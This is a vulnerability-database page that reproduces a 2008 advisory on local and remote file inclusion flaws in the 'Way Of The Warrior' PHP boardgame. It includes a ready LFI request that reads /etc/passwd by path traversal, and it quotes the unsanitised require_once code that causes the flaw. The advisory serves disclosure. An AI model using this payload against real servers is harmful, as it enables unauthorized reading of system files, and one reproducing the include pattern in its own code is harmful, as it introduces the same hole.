Lucene search
+L

wotw 5.0 - Local/Remote File Inclusion

🗓️ 04 Nov 2008 00:00:00Reported by dunType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

wotw 5.0 - Local/Remote File Inclusion Vulnerability in "Way Of The Warrior web boardgame

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6223
4 Nov 200800:00
circl
circl
Circl
CVE-2008-6224
4 Nov 200800:00
circl
cve
CVE
CVE-2008-6223
20 Feb 200923:00
cve
cve
CVE
CVE-2008-6224
20 Feb 200923:00
cve
cvelist
Cvelist
CVE-2008-6223
20 Feb 200923:00
cvelist
cvelist
Cvelist
CVE-2008-6224
20 Feb 200923:00
cvelist
euvd
EUVD
EUVD-2008-6193
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-6194
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6223
20 Feb 200923:30
nvd
nvd
NVD
CVE-2008-6224
20 Feb 200923:30
nvd
Rows per page
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [ wotw <= 5.0 ]   Local/Remote File Inclusion Vulnerability   #
 ##################################################################
 #
 # Script: "Way Of The Warrior is a web boardgame of fantasy battle..."
 #
 # Script site: http://wotw.altervista.org/
 # Download: http://sourceforge.net/project/platformdownload.php?group_id=178414
 #
 # [LFI] Vuln: http://site.com/wotw_5.0_en/visualizza.php?plancia=../../../../../../etc/passwd%00
 #
 # Bug: ./wotw_5.0_en/visualizza.php (line: 17)
 #
 # ...
 # 	require_once("plance/".$_GET['plancia'].".php"); 	// LFI
 # ...
 #
 #
 # [RFI] Vuln: http://site.com/wotw_5.0_en/crea.php?plancia=[spread?]
 #
 # Bug: ./wotw_5.0_en/visualizza.php (lines: 12-19)
 #
 # ...
 # 	if(isset($_GET['plancia']))
 #   	{
 #    	require_once("configurazione/tipi.php");
 #    	require_once("unita/unita.php");
 #    	require_once("plance/plance.php");
 #    	require_once("giocatori/giocatori.php");
 #    	require_once("terreni/terreni.php");
 #    	require_once("".$_GET['plancia']); 			// RFI
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ]

*******************************************************************************************

# milw0rm.com [2008-11-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02453
31